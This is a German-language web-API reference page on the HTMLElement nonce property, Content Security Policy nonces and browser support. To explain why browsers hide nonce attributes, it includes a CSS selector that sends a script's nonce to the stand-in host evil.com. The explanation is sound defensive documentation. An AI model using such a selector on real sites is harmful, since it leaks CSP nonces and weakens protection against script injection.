HTMLElement: nonce-Eigenschaft

Baseline Widely available

This feature is well established and works across many devices and browser versions. It’s been available across browsers since August 2016.

Die nonce-Eigenschaft der HTMLElement-Schnittstelle gibt die kryptografische Nummer zurück, die einmal verwendet wird und von der Content Security Policy verwendet wird, um zu bestimmen, ob ein bestimmter Abruf ausgeführt werden darf.

In späteren Implementierungen stellen Elemente ihr nonce-Attribut nur Skripten zur Verfügung (und nicht über Nebenkanäle wie CSS-Attributselektoren).

Beispiele

Abrufen eines nonce-Werts

In der Vergangenheit unterstützten nicht alle Browser das nonce IDL-Attribut, daher wurde ein Workaround genutzt, indem versucht wurde, getAttribute als Fallback zu verwenden:

js
let nonce = script["nonce"] || script.getAttribute("nonce");

Jedoch verbergen neuere Browserversionen nonce-Werte, die auf diese Weise zugegriffen werden (ein leerer String wird zurückgegeben). Die IDL-Eigenschaft (script['nonce']) wird der einzige Weg sein, um Nonces zuzugreifen.

Das Verbergen von Nonces hilft, Angreifern zu verhindern, Nonce-Daten über Mechanismen abzuziehen, die Daten von Inhaltsattributen erfassen können, wie diesen CSS-Selektor:

css
script[nonce~="whatever"] {
  background: url("https://evil.com/nonce?whatever");
}

Spezifikationen

Specification
HTML
# dom-noncedelement-nonce

Browser-Kompatibilität

Report problems with this compatibility data on GitHub
desktopmobile
Chrome
Edge
Firefox
Opera
Safari
Chrome Android
Firefox for Android
Opera Android
Safari on iOS
Samsung Internet
WebView Android
WebView on iOS
nonce

Legend

Tip: you can click/tap on a cell for more information.

Full support
Full support
Partial support
Partial support
Has more compatibility info.

Siehe auch